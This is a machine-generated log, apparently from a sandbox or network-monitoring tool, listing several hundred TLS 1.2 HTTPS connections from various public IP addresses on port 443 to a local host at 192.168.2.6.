Source: unknown	HTTPS traffic detected: 218.213.216.154:443 -> 192.168.2.6:52200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:55922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:56026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:55919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:55932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.232.116:443 -> 192.168.2.6:56229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:56162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:56129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:56120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:56706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:56704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:56881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:56942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:56770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:56777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:56995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:57032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:57036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:57184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:56778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:57018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:57033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:57199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:57161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:57284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:57332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:57673 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:57200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:57073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:57706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:57207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:57741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:58062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:58045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:57792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:57813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:57812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:57846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:58260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:58326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:58327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:58413 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:58469 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:58708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:59443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:59642 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:59582 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:59781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:59645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:59700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:59921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:60014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:60234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:59897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:60434 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:60539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:59940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:59869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:60840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:60729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:60892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:60891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:60799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:60905 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:60924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:60941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:61335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:61563 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:61610 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:61477 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:61402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:61602 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:62063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:62180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:61872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:61874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:61879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:62340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:62345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:62410 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:62408 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:62183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:62488 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:62498 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:62512 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:62330 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:62624 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:62862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:62351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:63031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:62467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:62813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:62870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:63111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:62939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:63051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:63325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:63341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:63187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:63194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:62679 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:63653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:63750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:63858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:63987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:64264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:64273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:64068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:64044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:64125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:64367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:64268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:64587 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:64319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:64352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:64181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:64507 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:64402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:64771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:64750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:64663 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:64745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:64890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:64946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:64746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:64988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:64972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:65189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:65018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:64844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:65326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:65302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:65196 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:65296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:65286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:65226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:65442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:65343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:65445 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:65216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:49342 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:49215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:65484 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:49273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:49373 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:49489 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49546 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:49615 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:49389 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:50243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:50233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:50383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:50325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:50375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:50462 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:50487 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:50630 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:51089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:50885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:50824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:51402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:51173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:51209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:51284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:51273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:51414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51492 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:51612 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:51394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:51064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:51046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:51746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:51467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:51851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:51644 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:51501 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:51922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:51635 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:51756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:51988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:52551 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:52667 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:52602 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:52590 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:52647 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:52826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:53117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:52996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:53370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:53435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:53462 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:53368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:53496 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:53610 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:53665 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:53896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:54092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:53994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:54424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:54457 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:54116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:54094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:54728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:54279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:54465 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:55062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:54552 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:55043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:54083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:54422 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:55020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:55059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:55355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:55819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:55309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:55309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:56057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:56046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:56178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:56134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:56315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:57090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:57178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:57111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57112 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:57276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:57316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:57321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:57652 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:57677 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:57906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:57761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:57772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:57884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:57950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:57978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:57981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:57952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:57979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:58351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:58353 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:58355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:58352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:58276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:58484 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:58795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:59072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:59262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:59152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:59224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:59333 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:59336 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:59368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:59311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:59422 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:59516 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:59421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:59397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:59567 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:59688 version: TLS 1.2
